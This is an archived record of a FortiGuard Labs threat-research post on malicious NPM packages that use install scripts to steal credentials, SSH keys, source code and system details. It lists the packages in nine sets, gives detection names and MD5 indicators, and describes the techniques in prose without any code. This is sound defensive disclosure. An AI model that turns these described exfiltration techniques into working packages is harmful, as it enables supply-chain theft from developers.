{
	"id": "900a9625-f2ce-4f59-a43e-62ab86256589",
	"created_at": "2026-04-06T00:15:24.99568Z",
	"updated_at": "2026-04-10T03:21:56.427644Z",
	"deleted_at": null,
	"sha1_hash": "914640e1a4872165214d47e9730b3cfc13d8fe0d",
	"title": "Malicious Packages Hidden in NPM | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62874,
	"plain_text": "Malicious Packages Hidden in NPM | FortiGuard Labs\r\nBy Jin Lee, Jenna Wang\r\nPublished: 2023-10-02 · Archived: 2026-04-05 21:08:04 UTC\r\nAffected platforms: All platforms where NPM packages can be installed\r\nImpacted parties: Any individuals or institutions that have these malicious packages installed\r\nImpact: Leak of credentials, sensitive information, source code, etc.\r\nSeverity level: High\r\nOver the past few months, the FortiGuard Labs team has discovered several malicious packages hidden in NPM\r\n(Node Package Manager), the largest software registry for the JavaScript programming language. These packages\r\nwere found through a system dedicated to discover malicious open-source packages from various ecosystems e.g.\r\nPyPI, NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or\r\nfunctions.\r\nIn general, most of these malicious packages use install scripts that run pre or post-install. Whenever an NPM\r\npackage is installed, those scripts are run as well. An example of this is shown below.\r\nEvery package we found aims to steal sensitive data, such as system or user information, via a webhook or file-sharing link. Let’s explore the sets of packages below.\r\nThe First Set:\r\n@expue/webpack (version 0.0.3-alpha.0)\r\n@expue/core (version 0.0.3-alpha.0)\r\n@expue/vue3-renderer (version 0.0.3-alpha.0)\r\n@fixedwidthtable/fixedwidthtable (version 0.0.2)\r\n@virtualsearchtable/virtualsearchtable (version 0.1.1)\r\nThis first set shows an obfuscated index.js script. However, we can identify some clues in the strings that may\r\nraise suspicions. Let’s try to simplify this code.\r\nAfter cleaning up the script, we can see it exfiltrates sensitive data, including Kubernetes configurations, SSH\r\nkeys, and other critical information. It also gathers basic system fingerprinting details, like username, IP address,\r\nand hostname, without any prior warning.\r\nThe Second Set:\r\nbinarium-crm (versions 1.0.0, 1.0.9, 1.9.9)\r\ncareer-service-client-0.1.6 (versions 0.1.6, 0.1.13, 0.1.15)\r\nhh-dep-monitoring (versions 0.1.5, 0.1.14)\r\norbitplate (versions 1.0.4, 1.0.6)\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 1 of 9\n\nThe index.js in this second set of packages sends an HTTP GET request to a specific URL, including query\r\nparameters. It scans for particular files and directories that may contain sensitive information. This script also\r\nenables the unauthorized extraction of critical developer data, including source code and configuration files. The\r\ntargeted files and directories may contain highly valuable intellectual property and sensitive information, such as\r\nvarious application and service credentials. It then archives these files and directories and uploads the resulting\r\narchives to an FTP server.\r\nThe Third Set:\r\n@zola-helpers/client (versions 1.0.1, 1.0.2, 1.0.3)\r\nsuncorp-styleguide-base (versions 1.0.3, 1.0.4, 1.0.5)\r\nIn this set, the index.mjs install script uses a Discord webhook to exfiltrate sensitive data, such as system\r\ninformation, username, and folder contents.\r\nThe Fourth Set:\r\n@next-translate-root/i18n (versions 1.0.1, 1.0.2)\r\n@ag-grid-react/lib (version 1.0.1)\r\n@next-translate-root/locales (versions 1.0.0, 1.0.1, 1.0.2)\r\nAs with the third set, this fourth set also uses an index.mjs install script and a Discord webhook to exfiltrate\r\nsensitive data. But this time, they use an alternate style of coding.\r\nThe Fifth Set:\r\n@dtx-company/flowcode-generator-types (version 200000.0.2)\r\nThis fifth set uses an index.js install script to exfiltrate host and username info and home users’ home directory\r\ncontents via a webhook.\r\nThe Sixth Set:\r\nsquarespace-abtest (version 1.0.1)\r\nruamel.taml.clib (version 0.1.2)\r\nregily (version 1.0.0)  \r\ndeveloper-scaffold-full-width-wrapper (versions 1.9.9, 21.0.9)\r\n@abb-americas/angular-utilities (version 1.0.0)\r\n@abb-americas/image-scaler (version 1.0.0)\r\n@abdulmz/mz-test (version 1.1.1)\r\n@ikea-aoa/component-financial-services (version 99.0.1)\r\n@ikea-aoa/component-lightbox (version 99.0.1)\r\n@ikea-aoa/component-popover (version 99.0.0)\r\nThis set—the most commonly found style—uses yet another index.js install script to exfiltrate information.\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 2 of 9\n\nThe Seventh Set:\r\n@cima/prism-utils (versions 23.2.1, 23.2.2)\r\nIn this set, the packages use an installer.js install script to carry out the attack, similar to the previous two, but we\r\ncan see that the environment variable ‘NODE_TLS_REJECT_UNAUTHORIZED’ is set to ‘0’. This disables TLS\r\ncertificate validation, which may make the connection insecure and vulnerable to man-in-the-middle attacks.\r\nThe Eighth Set:\r\ndiscorddd.jss (versions 1.4.9, 1.5.0, 1.6.4)\r\nsaaaaaaaaaaaaaaaaaaaaaaa (version 1.4.1)\r\nThis package automatically downloads and executes a potentially malicious executable file from a URL to a C:/\r\ndirectory.\r\nThe Ninth Set:\r\nevernote-thrift (version 1.9.99)\r\nen-features-rollout (version 1.90.9)\r\nen-conduit-electron (version 1.90.9)\r\nen-conduit-electron-auth (version 1.90.9)\r\nen-conduit-electron-worker (version1.90.9)\r\nen-thrift-internal (version 2.30.9)\r\nen-conduit-electron-renderer (version 1.90.9)\r\nThis package uses another script style to gather system information, including the victim’s public IP address and\r\nthen exfiltrates this information to a discord webhook.\r\nConclusion\r\nThis blog groups together a collection of malicious NPM packages that use install scripts to steal users’ sensitive\r\ninfo based on styles of code or functions. End users should watch for packages that employ suspicious install\r\nscripts and exercise caution. We will continue hunting for and reporting malicious packages to help users avoid\r\nbecoming victims.\r\nFortinet Protections\r\nFortiguard AntiVirus detects the malicious files identified in this report as\r\n@zola-helpers/client-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@zola-helpers/client-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\n@zola-helpers/client-1.0.3 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/i18n-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/i18n-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 3 of 9\n\nsuncorp-styleguide-base-1.0.3 index.mjs: JS/WebHook.CNYS!tr\r\nsuncorp-styleguide-base-1.0.4 index.mjs: JS/WebHook.CNYS!tr\r\nsuncorp-styleguide-base-1.0.5 index.mjs: JS/WebHook.CNYS!tr\r\n@ag-grid-react/lib-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.0 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.1 index.mjs: JS/WebHook.CNYS!tr\r\n@next-translate-root/locales-1.0.2 index.mjs: JS/WebHook.CNYS!tr\r\n@dtx-company/flowcode-generator-types-200000.0.2 index.js: JS/Agent.OAST!tr\r\nsquarespace-abtest-1.0.1 index.js: JS/Agent.OAST!tr\r\nruamel.taml.clib-0.1.2 index.js: JS/Agent.OAST!tr\r\nregily-1.0.0 index.js: JS/Agent.OAST!tr\r\ndeveloper-scaffold-full-width-wrapper-1.9.9 index.js: JS/Agent.OAST!tr\r\ndeveloper-scaffold-full-width-wrapper-21.0.9 index.js: JS/Agent.OAST!tr\r\n@abb-americas/angular-utilities-1.0.0 index.js: JS/Agent.OAST!tr\r\n@abb-americas/image-scaler-1.0.0 index.js: JS/Agent.OAST!tr\r\n@abdulmz/mz-test-1.1.1 index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-financial-services index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-lightbox-99.0.1 index.js: JS/Agent.OAST!tr\r\n@ikea-aoa/component-popover-99.0.0 index.js: JS/Agent.OAST!tr\r\n@cima/prism-utils-23.2.1 installer.js: JS/Agent.OAST!tr.dldr\r\n@cima/prism-utils-23.2.2 installer.js: JS/Agent.OAST!tr.dldr\r\ndiscorddd.jss-1.4.9 index.js: JS/Agent.CDPC!tr.dldr\r\ndiscorddd.jss-1.5.0 index.js: JS/Agent.CDPC!tr.dldr\r\ndiscorddd.jss-1.6.4 index.js: JS/Agent.CDPC!tr.dldr\r\nsaaaaaaaaaaaaaaaaaaaaaaa-1.4.2 index.js: JS/Agent.CDPC!tr.dldr\r\nevernote-thrift-1.9.99 index.js: JS/WebHook.ESY!tr\r\nen-features-rollout-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-auth-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-worker-1.90.9 index.js: JS/WebHook.ESY!tr\r\nen-thrift-internal-2.30.9 index.js: JS/WebHook.ESY!tr\r\nen-conduit-electron-renderer-1.90.9 index.js: JS/WebHook.ESY!tr\r\n@expue/webpack-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@expue/core-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@expue/vue3-renderer-0.0.3-alpha.0 index.js: JS/Agent.ATTC!tr\r\n@fixedwidthtable/fixedwidthtable-0.0.2 index.js: JS/Agent.ATTC!tr\r\n@virtualsearchtable/virtualsearchtable-0.1.1 index.js: JS/Agent.ATTC!tr\r\nbinarium-crm 1.0.0 index.js: JS/Agent.CFRE!tr.dldr\r\nbinarium-crm 1.0.9 index.js: JS/Agent.CFRE!tr.dldr\r\nbinarium-crm 1.9.9 index.js: JS/Agent.CFRE!tr.dldr\r\ncareer-service-client-0.1.6 index.js: JS/Agent.CFRE!tr.dldr\r\ncareer-service-client-0.1.13 index.js: JS/Agent.CFRE!tr.dldr\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 4 of 9\n\ncareer-service-client-0.1.15 index.js: JS/Agent.CFRE!tr.dldr\r\nhh-dep-monitoring-0.1.5 index.js: JS/Agent.CFRE!tr.dldr\r\nhh-dep-monitoring-0.1.14 index.js: JS/Agent.CFRE!tr.dldr\r\norbitplate-1.0.4 index.js: JS/Agent.CFRE!tr.dldr\r\norbitplate-1.0.6 index.js: JS/Agent.CFRE!tr.dldr\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers\r\nrunning current AntiVirus updates are protected.\r\nThe FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.\r\nThe FortiDevSec SCA scanner detects malicious packages, including those cited in this report that may operate as\r\ndependencies in users' projects in test phases, and prevents those dependencies from being introduced into users'\r\nproducts.\r\nIf you believe these or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\n@zola-helpers/client-1.0.1 index.mjs\r\n           MD5: e905c2915762e6c1fa57ff3b444411da\r\n@zola-helpers/client-1.0.2 index.mjs\r\n           MD5: 1e5a38b17453379af9107a9afce0963f\r\n@zola-helpers/client-1.0.3 index.mjs\r\n           MD5: c7325f2347833eba9869926226027330\r\n@next-translate-root/i18n-1.0.1 index.mjs\r\n            MD5: cb37bd25c3011ffdd10c0db976c77b45\r\n@next-translate-root/i18n-1.0.2 index.mjs\r\n           MD5: c4bf513d91909de6d8c8e28fe317950a\r\nsuncorp-styleguide-base-1.0.3 index.mjs\r\n           MD5: 404c75ee8c8a2241e94773a5f46cd372\r\nsuncorp-styleguide-base-1.0.4 index.mjs\r\n           MD5: 0b4da6e4a3d7f0d43afc1ce5a567aeed\r\nsuncorp-styleguide-base-1.0.5 index.mjs\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 5 of 9\n\nMD5: fbf108d9534e2a065ba62198d7ab226c\r\n@ag-grid-react/lib-1.0.1 index.mjs\r\n            MD5: 42d7f4f9e4d837c5f1217165e92d0136\r\n@next-translate-root/locales-1.0.0 index.mjs\r\n           MD5: 312368807bee4e8876acec4dba528f13\r\n@next-translate-root/locales-1.0.1 index.mjs\r\n           MD5: cb37bd25c3011ffdd10c0db976c77b45\r\n@next-translate-root/locales-1.0.2 index.mjs\r\n           MD5: c4bf513d91909de6d8c8e28fe317950a\r\n @dtx-company/flowcode-generator-types-200000.0.2 index.js\r\n           MD5: 1b80da13c2d440b51de3e3b1f84b30b6\r\n squarespace-abtest-1.0.1 index.js\r\n           MD5: 0976fc4401a315d8182828d07b0e4a02\r\nruamel.taml.clib-0.1.2 index.js\r\n            MD5: 489af9e516d133f8341bc50068b3a505\r\nregily-1.0.0 index.js\r\n            MD5: 8333f68439addfe5d80d7cf8646d74f6\r\ndeveloper-scaffold-full-width-wrapper-1.9.9 index.js\r\n            MD5: c627ce5ec695ea663b88a09fb31ea319\r\ndeveloper-scaffold-full-width-wrapper-21.0.9 index.js\r\n            MD5: 563cf757e5f61a592f53506c81360e4a\r\n@abb-americas/angular-utilities-1.0.0 index.js\r\n            MD5: 2965d88976fee79d1e3ef69e5edc5d83\r\n@abb-americas/image-scaler-1.0.0 index.js\r\n            MD5: 0876c5969dc829f2f56b455ae38a2536\r\n@abdulmz/mz-test-1.1.1 index.js\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 6 of 9\n\nMD5: ecd47a29a7e5132f94b1c7c0689e2e5a\r\n@ikea-aoa/component-financial-services-99.0.1 index.js\r\n            MD5: 025809495e179b4f7ef0db8af88381e7\r\n@ikea-aoa/component-lightbox-99.0.1 index.js\r\n            MD5: 025809495e179b4f7ef0db8af88381e7\r\n@ikea-aoa/component-popover-99.0.0 index.js\r\n            MD5: 025809495e179b4f7ef0db8af88381e7\r\n@cima/prism-utils-23.2.1 installer.js\r\n            MD5: 42d84beccb38c08700920b70549f5a87\r\n@cima/prism-utils-23.2.2 installer.js\r\n            MD5: 25de187869441c3aa506ddc5fe6839ea\r\ndiscorddd.jss-1.4.9 index.js\r\n            MD5: dc60d3e82ff0273309a2a9e1b7f89ea3\r\ndiscorddd.jss-1.5.0 index.js\r\n            MD5: 740eca0a347fe0d0aa8ca8ec4ebf2dd2\r\ndiscorddd.jss-1.6.4 index.js\r\n            MD5: 5182a61ee33247e2a426c4ddfe8196dc\r\nsaaaaaaaaaaaaaaaaaaaaaaa-1.4.2 index.js\r\n            MD5: 8458b6a4196e5d86e241c758ce89d1e5\r\nevernote-thrift-1.9.99 index.js\r\n            MD5: 359f456996c39e7882afeda8fbbf226f\r\nen-features-rollout-1.90.9 index.js\r\n            MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-1.90.9 index.js\r\n            MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-auth-1.90.9 index.js\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 7 of 9\n\nMD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-worker-1.90.9 index.js\r\n            MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-thrift-internal-2.30.9 index.js\r\n            MD5: 0f67856db1e0c466d13079cc9cb16963\r\nen-conduit-electron-renderer-1.90.9 index.js\r\n            MD5: 0f67856db1e0c466d13079cc9cb16963\r\n@expue/webpack-0.0.3-alpha.0 index.js\r\n            MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@expue/core-0.0.3-alpha.0 index.js\r\n            MD5: 8b82f6112b22bd67cccc4ad238bfea7c\r\n@expue/vue3-renderer-0.0.3-alpha.0 index.js\r\n            MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@fixedwidthtable/fixedwidthtable-0.0.2 index.js\r\n            MD5: 084c4c5a1d36fbdab6705a2fbd7e849e\r\n@virtualsearchtable/virtualsearchtable-0.1.1 index.js\r\n            MD5: 37f9d6a97af8d7589bbc11aadcf185ec\r\nbinarium-crm-1.0.0 index.js\r\n            MD5: acf9777d3fabc82b49ddb096147de6a9\r\nbinarium-crm-1.0.9 index.js\r\n            MD5: acf9777d3fabc82b49ddb096147de6a9\r\nbinarium-crm-1.9.9 index.js\r\n            MD5: acf9777d3fabc82b49ddb096147de6a9\r\ncareer-service-client-0.1.6 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\ncareer-service-client-0.1.13 index.js\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 8 of 9\n\nMD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\ncareer-service-client-0.1.15 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nhh-dep-monitoring-0.1.5 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nhh-dep-monitoring-0.1.14 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\norbitplate-1.0.4 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\norbitplate-1.0.6 index.js\r\n            MD5: 3d1dbd501ebaae4745f6ec37850f9ff5\r\nSource: https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nhttps://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm"
	],
	"report_names": [
		"malicious-packages-hiddin-in-npm"
	],
	"threat_actors": [],
	"ts_created_at": 1775434524,
	"ts_updated_at": 1775791316,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.pdf",
		"text": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.txt",
		"img": "https://archive.orkl.eu/914640e1a4872165214d47e9730b3cfc13d8fe0d.jpg"
	}
}